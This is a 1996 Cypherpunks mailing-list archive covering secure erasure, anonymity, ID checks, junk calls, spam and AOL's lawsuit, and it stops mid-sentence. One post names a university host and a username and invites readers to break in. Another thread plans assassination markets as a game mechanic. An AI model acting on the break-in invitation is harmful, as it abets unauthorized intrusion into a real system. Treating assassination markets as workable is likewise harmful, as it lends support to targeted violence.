this. We don't do blocking. (Fortunately, they haven't called me since.) > These rates have really come down a lot. The unlimited calls is what sold me. As you yourself point out, their charging you for each incoming call during business hours is unacceptable. Why don't they bill the 42c / minute to whomever is calling YOU, as they do with LD and 900 numbers? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jimbell at pacifier.com Sat Sep 7 12:10:34 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 8 Sep 1996 03:10:34 +0800 Subject: What the NSA is patenting Message-ID: <199609071627.JAA01473@mail.pacifier.com> At 12:18 AM 9/7/96 -0800, Adamsc wrote: >On Fri, 06 Sep 1996 11:59:18 -0500, John Deters wrote: > >>I hope some hardware hacker who knows their low-level stuff will be able to >>write a secure disk wiper. > >They have: it's called a bulk tape eraser. > > >I'd just store everything sensitive on a floppy. Those are easy to erase with a >heavy duty magnet (not a wimpy refrigerator magnet). I understand slagging one >in the microwave is also effective . Just remember that an AC-driven bulk eraser will be far more effective than a permanent magnet at erasing data securely. An oscillating magnet field re-magnetizes the floppy 120 times per second, as opposed to the single magnetization done by the permanent magnet. Each pass through the hysteresis curve brings down residual signals somewhat, maybe 10 db. With the AC field, it's hard NOT to have a good erase. Jim Bell jimbell at pacifier.com From dlv at bwalk.dm.com Sat Sep 7 12:38:57 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 8 Sep 1996 03:38:57 +0800 Subject: "The Bill of Rights can be dangerous...." In-Reply-To: Message-ID: <4X1VTD27w165w@bwalk.dm.com> tcmay at got.net (Timothy C. May) writes: > As with Adam Back's mini-rant yesterday, this is exactly correct. In a free > society, speech need not be approved, registered, escrowed, labelled, or > identified with the Registered True Name of the speaker. But the U.S. is not a "free society". Tim yaks at those who criticize his beloved United States for not being "polite". Tim is wrong. > "Books and magazines can be dangerous [bomb recipes, racial hatred, > instilling bad values, etc.]-- as can restrictions on reading, especially > in/by repressive regimes. Therefore I would favor allowing unfettered > reading -- with some form of traceability only under terms considerably > stronger than what are generally required for a wiretap." > > (i.e., "book escrow," where one's reading materials are escrowed with > Trusted Authorities, and only accessed by law enforcement under Proper > Conditions. Failure to escrow reading materials would be a Class B felony. > Cf. the FBI's Library Awareness Program of circa 1987-8.) I remember beig surprised to discover that the library computer at City University of New York (state school where I got all my degrees) had an (easily accessible) record of every book I've ever checked out in some 15 years, And by the way you need to present A LOT of ids to take books out of New York's public libraries, or to use the public-access computers in them. And by the way you're asked to sign your name and affiliation (fortunately, no ID is required) if you want to just enter NYPL's Slavic division and use their reading room. Apparently this was instituted during the cold war under the assumption that anyone interested in Slavic Division's materials needs to be watched. > "People moving around can be dangerous [avoiding parental responsibilities, > avoiding taxes, spying, plotting to bomb buildings]-- as can traceability, > especially in/by repressive regimes. Therefore I would favor allowing > freedom of movement -- with some form of traceability only under terms > considerably stronger than what are generally required for a wiretap." > > (a la the "position escrow system" I predicted a couple of years ago would > someday be seriously considered) Have you tried to get on an airplane lately? I just had to present my driver licence (work id w/ picture wouldn't cut it!) to get on. I understand John Gilmore got himself arrested for refusing to identify himself. As he said, there used to be a 200-year precedent that a citizen can travel within the country without having to identify himself. Shit, I used to fly under phoney names - can't do this anymore. > A version for anonymous purchases and sales: > > "Anonymity in sales and purchases can be dangerous [bomb materials, stolen > goods, unhealthful foods, etc.] -- as can traceability, especially in/by > repressive regimes. Therefore I would favor allowing anonymous purchases > and sales of goods -- with some form of traceability only under terms > considerably stronger than what are generally required for a wiretap." > > (There go the flea markets and garage sales (for buyers), which are largely > anonymous. There goes walking into a store and paying cash for a piece of > pipe (could be made into a bomb). There goes cash, period. See next item.) A very good friend of mine does EE for a living, and in particular he sells some EE equipment by mail order. He told me that every time he sells something like the gizmo to write magnetic strips on credit cards, he gets a phone call from los federales saying: you sold X who paid with Y and shipped it to address Z - do you have any additional details? He says every time they know as much about the sale as he does. :-) > A version for cash: > > "Cash can be dangerous [illegal purchases, drugs, prostitution, tax > evasion, illegal workers, extortion, etc.] -- as can traceable money, > especially in/by repressive regimes. Therefore I would favor allowing cash > -- with some form of traceability only under terms considerably stronger > than what are generally required for a wiretap." That's why any time you attempt a cash transaction for over 10K (buying a car, depositing it in a bank, etc), you will, by law, be reported to the IRS, who will take a close look. I can't recall the name of the guy who tried to take over 10K of cash out of the country without declaring it, was searched, was caught, and is currently in jail. > And so on. One can take Dyson's basic argument for why anonymity may be > dangerous at times and why it may need to be restricted, limited, or > banned, and use these arguments for a variety of other basic freedoms. > Essentially, freedom can be dangerous. The world can be dangerous. In fact, > it is. As I told John Gilmore: I've known Esther Dyson for some time before she got involved with EFF. I consider her a very nice person, and admire her activities in Eastern Europe and elsewhere (and am in particular thankful for her help on my past projects). I suspect that Esther simply didn't think enough about this question before saying what she was quoted as saying... I hope Esther will research the issue further, and knowing her pro-liberty record, I'm sure she will see the value of absoletely untraceable anonymity. (Likewise I have great respect for Dr. Dorothy Denning, with whom I has a very interesting conversation yesterday. She showed me cituations where GAK (or generally employer access to keys) makes sense - not when it's used by folks not affiliated with the government or the employer, of course.) From johnbr at atl.mindspring.com Sat Sep 7 12:40:36 1996 From: johnbr at atl.mindspring.com (John Brothers) Date: Sun, 8 Sep 1996 03:40:36 +0800 Subject: Metcalf and Other Net.Fogies Message-ID: <1.5.4.32.19960907164630.006d211c@pop.atl.mindspring.com> At 11:17 AM 9/7/96 -0400, perry at piermont.com wrote: > > > >I'm "involved with the problems" too, you know. Don't teach granpaw to >suck eggs. OF COURSE there are problems. None of them, however, are >signs of "collapse". This whole thing makes me ill - maybe I'm just an idiot. What could possibly cause a collapse? More usage?? No - that would just mean that everyone's access would be slower. Do routers fail because they can't talk to other routers? no - they route around it. I consider myself reasonably educated when it comes to the layout of the internet, and I have never heard _anyone_ ever say what constitutes a collapse, and, if it means 'catastrophic permanent failure of the Internet', what could possibly cause that. These people are acting like one day, something is going to blow up, and the entire internet will follow, and stay down for a long long time. If all the DNS servers died, the internet would stop working for non-local access until they recovered. If there was a bug in Cisco routers that was set to go off on Thursday, September 12th, that would render them inoperable until power cycled, that would cause a major failure. If every building in MCI and Sprint's data network blew up, that would cause a major failure. If the usage increased so that the Internet was 'saturated', that doesn't qualify as a collapse. It qualifies as 'rush hour'. If the internet was in 'rush hour' 24 hours a day, it would be unfun to use, but unlike the highway system, we can add more lanes pretty much at will. (within reason). Will someone please explain to me what I'm missing? Thanks John --- John Brothers Do you have a right not to be offended? From attila at primenet.com Sat Sep 7 12:53:55 1996 From: attila at primenet.com (attila) Date: Sun, 8 Sep 1996 03:53:55 +0800 Subject: [RANT] Death of Usenet: Film at 11 Message-ID: <199609071720.LAA29986@InfoWest.COM> In Cypherpunks, on 08/19/96 at 01:34 PM, mpd at netcom.com (Mike Duvos) said: =If Singapore bans alt.sex.hooters, you could simply post to =alt.culture.singapore.i.got.your.hooters.right.here. [snip] =It would also send the correct message that "newsgroups" are simply =one of many labels on an article, and are not cyberspacial tearooms =where bad people congregate and there is guilt by association. I don't fault your argument on "sending the correct message," but since when has an oppressive government ever been concerned with "the correct message?" LEA's could care less about the message; their only interest is another opportunity to behave like the jack-booted thugs they generally are. but public opinion, certainly the government interests in control, have already determined in the court of small minds that "we" are inherently evil (and beyond redemption without coercion). A repressive government can not afford publications from unredeemed (and unrepentant) cyber-anarchists with a world wide audience. Is the daily comics the last refuge of freedom; witness today's "Thatch:" "cubicle cliches are one of the few things we all share; they're one of the few things that unite us as americans!" "that and utter, corrosive contempt for our elected officials." sarcasm has always been a potent weapon, and one of the hardest to silence. ..in bits and pieces it can slowly undermine the target. why is it tolerated? I'm sure our malicious uncle wanted to shut Doonsbury down during Vietnam, but joe-six-pack rarely understood the underlying message. =The alternative to doing something reasonable like this is probably =to see mass migration from "banned newsgroups" to off-topic groups, =like Lolita pictures in rec.pets.cats, when the inevitable crackdown =comes. has not the crackdown arrived? and are not the various skirmishes between governments on one side and the ISPs & users on the other sufficient evidence of governmental intentions? =As long as people can post =anonymously, they will simply switch to another existing newsgroup =when the one they are posting to becomes blocked. Once the =inevitable reciprocal pissing contest between posters and censors =gets going, Usenet as we know it will likely be destroyed. let's put it this way, the first reaction will be to "eliminate" the anonymous remailers, then ban the "alt" groups which can be created at will. if there is migration from alt.sex.binaries to rec.cats, the government will eliminate the entire usenet and we will be forced back to the NWO controlled media conglomerates, or mail lists. of course, then the fascists will block or close down the list servers on some flimsy pretext such as violating the US postal monopoly and regulations.... Many companies block the alt groups; 15 years ago, even I blocked the alt groups during business hours (and usenet was only 1.5 MBytes per day then!), restoring them at 1800. --why? because the office staff spent *at least* all morning reading usenet, occasionally even refusing to talk to customers before their daily dose! My point is simple: I reacted by limiting the **time** of access, ** not access itself. ** On the other side, Reed, Buchannan &c. have decided *they* should judge what is fit (G rated) for our consumption; and, of course, Big Brother has determined they should be the judge of political correctness and all that shit which is numbing the minds of joe-six-pack until America is a controllable homogeneous bowl of putrid gruel. government, in and of itself, may be able to selectively prosecute cyberspace "violaters," but the real danger is big business. Print newspapers receive $64 billion in ad revenue, 80% of which is local. Virtually every major US newspaper (most owned by the group of 5) has a net presence --some very informative. And, even Mexico has more than a dozen of their papers on line. However, in the US the news is still the same collection of what the NWO wants us to hear/see. So far, the foreign press is not so inhibited and is often openly critical of US bumbling in foreign affairs, Bubba's alleged (alledged?) cocaine habit and criminal behaviour, --likewise critical of all fools. Where does this lead? Well, we've probably peaked on freedom; the rest is downhill as our "non-elected" government degenerates to deploying more and more thought control to maintain the oligarchic fascist form of what Jefferson thought they were creating as a representative republic. I for one enjoy tweaking their nose, but it only stiffens their resolve to squash me/us/whatever. How do you show resolve without being in their face? most regulation is created to "eliminate" abuse of a "public" privilege; unfortunately, we all suffer "collateral damage" to use their term. does voluntary compliance work? unfortunately, no. where does that leave us? confrontation, I guess. preserve our advantage as long as we can. we all know from m�nchen that Clement Atlee made a fool of himself appeasing Hitler for a false peace. might as well carry on with what we do best: rape, pillage, and burn... a scorched earth policy.... From ravage at einstein.ssz.com Sat Sep 7 12:58:38 1996 From: ravage at einstein.ssz.com (Jim Choate) Date: Sun, 8 Sep 1996 03:58:38 +0800 Subject: "The Bill of Rights can be dangerous...." (fwd) Message-ID: <199609071749.MAA01561@einstein> Hi all, Forwarded message: > Subject: Re: "The Bill of Rights can be dangerous...." > From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) > Date: Sat, 07 Sep 96 09:35:38 EDT > > I remember beig surprised to discover that the library computer at City > University of New York (state school where I got all my degrees) had an > (easily accessible) record of every book I've ever checked out in some > 15 years, And by the way you need to present A LOT of ids to take books > out of New York's public libraries, or to use the public-access > computers in them. And by the way you're asked to sign your name and > affiliation (fortunately, no ID is required) if you want to just enter > NYPL's Slavic division and use their reading room. Apparently this was > instituted during the cold war under the assumption that anyone > interested in Slavic Division's materials needs to be watched. In the very early 80's while I was attending UT Austin the FBI approached the libraries and requested access to the loan records. The libraries refused and went so far as to post a warning at each of the book checkout points on the event. Personaly, I was very proud of them for the refusal and the extra step of the warning. > A very good friend of mine does EE for a living, and in particular he > sells some EE equipment by mail order. He told me that every time he > sells something like the gizmo to write magnetic strips on credit cards, > he gets a phone call from los federales saying: you sold X who paid with > Y and shipped it to address Z - do you have any additional details? He > says every time they know as much about the sale as he does. :-) I have been dealing with security electronics for over 10 years and have never been approached by anyone regarding my activities. I make no secret of the fact that I do that sort of work as well as being able to build custom equipment if needed. I would suspect that there is a flag on your friend for something or someone from the past, not on his business in particular. Jim Choate CyberTects ravage at ssz.com From attila at primenet.com Sat Sep 7 13:15:07 1996 From: attila at primenet.com (attila) Date: Sun, 8 Sep 1996 04:15:07 +0800 Subject: Choice of Words Message-ID: <199609071742.LAA00692@InfoWest.COM> > --Tim May, who hopes he is never identified as the "John Doe" indicted, > tried, convicted, and sentenced in 1979 in Washington County, Oregon, for > the crime of unlawful foddering in a public place. > foddering? why, are you an indiscreet luncher? > Boycott "Big Brother Inside" software! > We got computers, we're tapping phone lines, we know that that ain't allowed > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Licensed Ontologist | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From roy at sendai.scytale.com Sat Sep 7 14:12:29 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Sun, 8 Sep 1996 05:12:29 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) In-Reply-To: <9608068420.AA842029748@smtplink.alis.ca> Message-ID: <960907.130338.3j4.rnr.w165w@sendai.scytale.com> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, jbugden at smtplink.alis.ca writes: > There is another spin possible on the reasons for replacement of > pay phones with credit card phones. In Canada all new credit card > phones are also able to take phone cards (which are anonymous). > > Using a prepaid phone card permits full anonymity. But what it also > permits is metered local calls. This infrastructure would be more > familiar to someone from Europe where metered local calls are the > norm. In Minneapolis, USWest has Telecard phones everywhere, and vending machines with bill accepters. The calls are also flat rate at $0.25. Beware using the Telecard for a long distance call. I did one from Seattle to Mpls and it was something like $3.65 for the initial charge. Can Telecards be audited for usage? If a TLA black-bags my $25 Telecard from my wallet, can they reconstruct what calls I made with it? - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjG5+Rvikii9febJAQFccwP+IUT/jAzygglq6L9HoMc1/j7JvMi/LpZP bNB0fGpJxP1xtQw+T3lsGwDo6ZkbeUd2H+k8sbZMagcQ2kzc2JIoyf5PEbKNgdTc kCHuwaSU7xHy/GOasfjy97VV4vd4ctqwxwGiKwi6Bc6UROjl8Ts8cLVQmsQC/JXl OU2Gvj1iB0k= =KrXb -----END PGP SIGNATURE----- From kermit69 at 10mb.com Sat Sep 7 14:17:45 1996 From: kermit69 at 10mb.com (Kermit69) Date: Sun, 8 Sep 1996 05:17:45 +0800 Subject: Have at it. Username provided Message-ID: <3231C53E.21B4@10mb.com> Hey. Try this, whitman.gmu.edu a username = myost From vznuri at netcom.com Sat Sep 7 14:46:01 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sun, 8 Sep 1996 05:46:01 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones In-Reply-To: Message-ID: <199609071839.LAA12411@netcom3.netcom.com> TCM: >Relevance to Crypto? The "junk e-mai" issue, calls for regulations (which >I'm against), technological solutions (Caller ID lets users decided to >accept a call or not....same idea could be used with e-mail, a la Hal >Finney's "You have a message of size X from size Y entitled Z" proposal for >positve acceptance of remailed messages), and the value of True Names (and >True Numbers). more and more I think the problem of "junk info" which we keep running into on this list is of key importance to future information technologies. loosely translated, I would call this the same problem that rears its head in many different information transfer formats. spam in newsgroups, junk mail in the email box, sales calls on the phone. can it be solved? caller ID is in one sense a solution to this problem. I suspect we will be seeing increasingly sophisticated solutions. in short, imagine a communication system with various entities. this could be a newsgroup, a phone system, an email system, etc. the fundamental problem is allowing the transfer of information that is "approved" by consenting parties, and rejecting the transfer of information (and preventing denial-of-service attack) for anything otherwise. a very tricky problem, because the value of information is subjective in the eyes of sender and receiver, and often people want to receive information and cannot tell whether they want it or not until they see it. for cpunks, there are additional goals. ideally pseudonymous communication or anonymous communication would be allowed. for the phone problem, one possible way of solving this is to have passwords. in addition to giving out your cell phone number, you give the person a digital password. you are free to vary this password yourself for multiple entities. they have to enter the right password for the call to go through (or for any charges to accrue). if you get junk calls, you at least know the individual password that was "compromised". you can reject that password in the future as being "dirty" and hand out a new password via your trusted channels to anyone who tells you they can't get through to you any more (and you don't necessarily want that to stay that way ). this system is remarkably similar to the way that intelligence agencies work, with their agents and spies. they deal with the problem of knowing which channels have been "compromised" and working with countermeasures. in fact I suspect that the intelligence community has developed very sophisticated ways of dealing with information transfer and "spoofing" (bad data so to speak) that might have major applications to the design of future cyberspace. such a system could be applied to email. I send out email passwords to my trusted associates (they might even be included in the email address itself). email that doesn't have a proper password I could either delete or put into the "low priority" bin. unfortunately this restricts email whereas one of the great aspects of email is its lack of controls and preventions in contacting people. but notice that one could still have a lot of relative freedom in this system. suppose that I gave a lecture to a large audience of people. I could then create a new password for that audience, and release it to them. if I get email under that password, I know it was somehow from someone in that audience, and it would be worth more to my attention, so to speak, than junk email. it has slightly more value than being totally "out-of-the-blue anonymous". if the address became too popular, or got into the hands of a marketer, I could hook it up to a form letter or disconnect it. in a sense this would be like something like having the ability to create or disconnect multiple phone numbers whenever you want. I suspect such systems will become more prevalent in the future. whenever you interface with other people, you will be given the opportunity to put it under your own personal "information channel" of choice. "inquiries on this subject should be addressed to [x]". a similar mechanism is used by advertisers to gauge the efficacy of their advertising. they say in the ad, "mention this ad to get [x]". this is setting up an independent information channel for identification. they also might set up a separate phone number for a given advertisement, and see how much traffic they get through that phone number independently. all this is invisible to the customer. the "junk info" problem becomes much more difficult to solve with public forums such as newsgroups, and the above approach would not seem to apply. others have proposed solutions that are related to packaging money in messages. "I will pay you 5 cents to read this message" which can be collected upon opening it. a very interesting proposal I think we will see actually put into practice. I suspect we will continue to see interesting innovations that focus on the problems of information dissemination. it's amazing how far we are into the information age without some key problems being solved yet. plenty of room for some innovative thoughts. I continue to believe there are some elegant solutions waiting to be found. From declan at eff.org Sat Sep 7 15:04:23 1996 From: declan at eff.org (Declan McCullagh) Date: Sun, 8 Sep 1996 06:04:23 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <199609070316.XAA13685@yakko.cs.wmich.edu> Message-ID: If AOL wants to stop spammers, let them. They have every right to do so as long as their agreement with their customers permits it. It's a matter of contract law between AOL and its customers and should not involve the spammers and a lawsuit brought by the spammers. It seems as though the judge was snookered by the spammers' claim of U.S. Mail-like service, free speech, blah. The right to free speech does extend to corporations; in that way, it includes the right *not* to speak. -Declan On Fri, 6 Sep 1996, Damaged Justice wrote: > > This is utter horseshit. AOL, like any private individual or organization, > has the right to refuse service to anyone at any time for any reason, or > even for no reason at all. The gubmint isn't doing SQUAT, except forcing > AOL to allow the spammers access. > > -- > http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information > Hey, Bill Clinton: You suck, and those boys died! I hope you die! > I feel a groove comin' on $ Freedom...yeah, right. > > // declan at eff.org // I do not represent the EFF // declan at well.com // From jimbell at pacifier.com Sat Sep 7 15:05:05 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 8 Sep 1996 06:05:05 +0800 Subject: MUD anyone? Message-ID: <199609071920.MAA08949@mail.pacifier.com> At 10:06 AM 9/1/96 +0000, Rev. Mark Grant wrote: >On Tue, 27 Aug 1996, Jon Leonard wrote: >Protection Agencies >Escrow Agencies >Private Law Courts (probably controlled by players rather than the computer) >Reputation Agencies > >> What am I missing? Should there be direct support for Jim Bell's >> assasination markets? It'd provide a means of demonstrating its >> ineffectiveness as a means of social control. > >I think it should be incorporated, but I think that people can set them up >easily themselves. Perhaps we should have an NPC-run 'Assasins Inc' which >would run the lottery, and then players could do the actual 'wet work'. > >But yes, I'd really like to see how this would work in the game. As I >said I'm thinking of this more as a semi-scientific experiment than a >pure game. We have some idea of how this stuff should work in theory, but >little of how it works in practice. > >I do think though that we'd have to enforce some kind of rule against >'disposable characters', otherwise people could simply create a new >character every time they were killed trying to assasinate someone. There >would need to be some disadvantage to just going in guns-blazing and being >killed ten times in a row. Wouldn't it be more realistic if instead of representing individual characters, you created composites which had a "weight" based on how many of them exist in the country/world? For example, the character "buggy-whip maker" in 1900 would be weighted in the thousands, while his number would be drastically reduced a few decades later. This would avoid the "going in with guns blazing" scenario, or at least it would put it into perspective: the number of assassins would drop by "1" (or some proportion) if that happened, although correspondingly the number of targets would also drop. With this system, a character would never die, but his number would simply drop to an insignificant quantity. ("Government-thugs" comes to mind...) And that's not the only reason the number of characters would drop: If it suddenly became "unhealthy" to accept a public paycheck, and thus the risk wasn't matched by the rewards, presumably people would shift professions. Again, this would all be part of the simulation. Jim Bell jimbell at pacifier.com From adam at homeport.org Sat Sep 7 15:05:21 1996 From: adam at homeport.org (Adam Shostack) Date: Sun, 8 Sep 1996 06:05:21 +0800 Subject: "The Bill of Rights can be dangerous...." In-Reply-To: <4X1VTD27w165w@bwalk.dm.com> Message-ID: <199609072038.PAA10538@homeport.org> I got on four seperate airplanes with a work ID in late August. All you need to do is ask for the manager, and ask to see where in the contract it says Goverment issued ID. Air tickets come with about 300 pages of contract included by reference. No where in those contracts is anything about government ID. I was told once that it was a secret FAA regulation that I wasn't allowed to see. After I saw it the women got really adamant that I couldn't see it in context, nor find out what regulation it was part of. (I saw, but did not get to keep, about 12 lines of dot matrix printed text on computer paper.) The words to use to get on a plane seem to be breach of contract, with managers. Adam Dr.Dimitri Vulis KOTM wrote: | > "People moving around can be dangerous [avoiding parental responsibilities, | > avoiding taxes, spying, plotting to bomb buildings]-- as can traceability, | > especially in/by repressive regimes. Therefore I would favor allowing | > freedom of movement -- with some form of traceability only under terms | > considerably stronger than what are generally required for a wiretap." | Have you tried to get on an airplane lately? I just had to present my | driver licence (work id w/ picture wouldn't cut it!) to get on. I | understand John Gilmore got himself arrested for refusing to identify | himself. As he said, there used to be a 200-year precedent that a | citizen can travel within the country without having to identify | himself. Shit, I used to fly under phoney names - can't do this anymore. -- "It is seldom that liberty of any kind is lost all at once." -Hume From rodger at interramp.com Sat Sep 7 16:12:05 1996 From: rodger at interramp.com (Will Rodger) Date: Sun, 8 Sep 1996 07:12:05 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com> -----BEGIN PGP SIGNED MESSAGE----- At 12:27 PM 9/7/96 -0700, Declan McCullagh wrote: >If AOL wants to stop spammers, let them. They have every right to do so as >long as their agreement with their customers permits it. It's a matter of >contract law between AOL and its customers and should not involve the >spammers and a lawsuit brought by the spammers. > >It seems as though the judge was snookered by the spammers' claim of U.S. >Mail-like service, free speech, blah. The right to free speech does >extend to corporations; in that way, it includes the right *not* to speak. > Declan raises a good point. But I'm guessing it's a bit more complex than that. CyberPromo and AOL lawyers tell me the court slapped down AOL simply to "keep the status quo." Both sides used those very words, in fact. What's more, CyberPromo talks a good game on the First Amendment, but used computer fraud and unfair competition statutes - not the Bill of Rights - in its original filing against AOL. So what's going on? It seems Weiner is _very_ aware that this case deals with things never before argued in court. No one has really sorted out just how much e-mail - if any - an ISP is obligated to carry against its wishes. What Weiner decides this fall may not set the kind of precendent that the case of the Pentagon Papers did, but will be important for a while at least. Will -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMjIIw0cByjT5n+LZAQFNWgf/Xb+yG9JDVZ6MN1Hz/K4IUCXL8hSgjeG3 +Ih+aXiod/vVAHXCJmktvBJFWWAJjpFjW/0WQljvsMULxXYpdXAYFDh4kiZZg4A3 7xkjCsT+Kpi8lDCRmFPciQfvoLyiEJxr8hI2l2qucE0THV0spysTKpgYueggLZI6 no5mC47ZGusfL9jWb7qrnbqjO1h+0mVZYgr0GRY8MVvyMsJGgylEDaiCh0KSaI1V TqEfTF+kcbzqtht0yG/M+QmCRertH4s1y9IWllWvJLMbAfwgFCxgGtamWoyXiHye keXAGLK0r2u8vTfwK5rJ91ZR774CGkZHulNi3wx53pZaFyYPJtYizA== =KS50 -----END PGP SIGNATURE----- From pstira at escape.com Sat Sep 7 16:19:15 1996 From: pstira at escape.com (pstira at escape.com) Date: Sun, 8 Sep 1996 07:19:15 +0800 Subject: Deleted Message (fwd) Message-ID: One must wonder about these military types. Hm... -millie ---------- Forwarded message ---------- Date: Sat, 7 Sep 96 16:50:21 -24000 From: MAILER-DAEMON at mqg-smtp3.usmc.mil To: pstira at escape.com Subject: Deleted Message To: "Gary Howland" From: MQG-SMTP3 at USMC_MASTERINET@Servers[] Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message in Transport deleted by: ADMINISTRATOR at USMC_MASTERINET@Servers From froomkin at law.miami.edu Sat Sep 7 16:31:57 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Sun, 8 Sep 1996 07:31:57 +0800 Subject: Anonymity and free speech In-Reply-To: <1.5.4.16.19960903035433.37773f1a@mail.io.com> Message-ID: Interested readers are invited to see that the issues are complex by looking at : http://www.law.miami.edu/~froomkin/articles/oceanno.htm On Mon, 2 Sep 1996, Greg Broiles wrote: > > Instead of discussing whether or not Esther Dyson or other EFF board members > are personally comfortable with anonymity, let's talk about whether or not > the EFF and its board members believe that the First Amendment provides a > right to speak and associate anonymously. (I believe that the First > Amendment gives everyone the right to wear a t-shirt which says "I am an > asshole." But I have no interest in wearing such a t-shirt. And so on.) > > I believe that it does, and that the Supreme Court has already made that > clear. In cypherpunks at toad.comparticular, I'm thinking of _NAACP v. Alabama > ex rel Patterson_, _Talley_, and _McIntrye v. Ohio Elections Commission_. > (Sorry for the lack of cites; 95% of my stuff is still in boxes and I'm > sending this via laptop and a Ricochet modem.) > > If the right to speak/associate in "real life" is protected by the First > Amendment, I don't see why it wouldn't be on computers and networks which > are located inside the United States. And if that right is based upon the > Constitution, it will take a constitutional amendment or a big sea change in > the Supreme Court to take it away. > (I wonder if the decision in _McIntrye_ would have gone the other way if Ms. > McIntrye were selling drugs via anonymous message pools instead of > discussing school funding via windshield flyers.) Discussions about the > utility of anonymity would be more useful if we were designing a > communication system or a constituion from scratch; but that's not our > current situation. Is there serious debate about whether or not the > Constitution and the Internet allow anonymous communication? (I'm not asking > a rhetorical question. If someone's familiar with an argument to the > contrary, please tell me about it.) Both the Constitution and the Internet > are difficult to modify quickly; we probably have anonymity (like it or not) > for at least a few more years. > > (I'm not trying to imply that US law is the only law, or that the rest of > the world doesn't existy. But I don't know poo about the right to anonymity > in other nations; and to a certain extent anonymity anywhere on the Internet > is the same as anonymity everywhere on the Internet. Are other readers aware > of other jurisdictions where anonymous speech is considered a right?) > > ---- > Greg Broiles > gbroiles at netbox.com > http://www.io.com/~gbroiles > [This message may have been dictated with Dragon Dictate 2.01. Please be alert for unintentional word substitutions.] A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And #@&*! humid. From jfricker at vertexgroup.com Sat Sep 7 16:42:40 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Sun, 8 Sep 1996 07:42:40 +0800 Subject: What the NSA is patenting Message-ID: <2.2.32.19960907212748.00ada824@vertexgroup.com> At 02:03 PM 9/6/96 -0700, you wrote: >At 12:50 AM 9/7/96, Jean-Francois Avon wrote: >>A maybe usefull program would be a little tsr that constantly >>overwrite unused sectors of the entire drive with random patterns >>(maybe seeded with a fast keyboard interval timer). Like at the very >>moment I am writing this, my HD has been idle for several minutes... >> > > >The NSA STM method is related to reading _very subtle_ variations in >magnetic domain modifications. Jitter in read-write head positions can be >thought of as a noise (N) added to some signal (S)l. Extraction of signals >in low S/N ration environments is a well-developed science. > This excerpt from a Wired article/interview http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html "No data is totally safe," says Sharp, who runs his Data Recovery Labs from the coincidentally named town of Safety Harbor, Florida. "But you can recover data that's been overwritten up to nine times. The only way to permanently remove data is with programs that can do a 'severe security erase,' when the drive is over-written 10 consecutive times." Believe it or don't! From m5 at vail.tivoli.com Sat Sep 7 16:51:00 1996 From: m5 at vail.tivoli.com (Mike McNally) Date: Sun, 8 Sep 1996 07:51:00 +0800 Subject: What the NSA is patenting In-Reply-To: <2.2.32.19960907212748.00ada824@vertexgroup.com> Message-ID: <3231EFAB.1A24@vail.tivoli.com> John F. Fricker wrote: > > This excerpt from a Wired article/interview > http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html > > "No data is totally safe," says Sharp ... That entire article struck me as a load of hogwash the first time I read it. This Sharp dude rehashed several old fairy tales about data recovery. ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From charlee at netnet.net Sat Sep 7 16:54:40 1996 From: charlee at netnet.net (kickboxer) Date: Sun, 8 Sep 1996 07:54:40 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!! Message-ID: <199609072146.QAA16610@netnet1.netnet.net> I really need help unsubscribing from the Cypherpunks list! it is imperative! From froomkin at law.miami.edu Sat Sep 7 17:04:11 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Sun, 8 Sep 1996 08:04:11 +0800 Subject: rc2 export limits.. In-Reply-To: Message-ID: isn't this what Bernstein's program that is the subject of a lawsuit in california does? On Thu, 5 Sep 1996, P. J. Ponder wrote: > > keywords: ITAR, SHA, beneficial and innocuous crypto > > The persistent reputation known as Bill Stewart wrote: > > >Date: Wed, 04 Sep 1996 23:09:17 -0700 > >From: Bill Stewart > >To: Kent Briggs <72124.3234 at compuserve.com> > >Cc: cypherpunks at toad.com > >Subject: Re: rc2 export limits.. > > > >I'm afraid my source is "Read it on the net and was surprised to hear it". > >My assumption is that the limit is for software that implements > >both signature and verification, since ITAR doesn't ban export of > >pure-authentication software. > > The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in > the fine print at the beginning that SHA is export controlled. I don't > have the document to refer to right now, but it plainly states that SHA > falls under ITAR. As a cryptographic hash function, why would it be > controlled in this way? > > How can 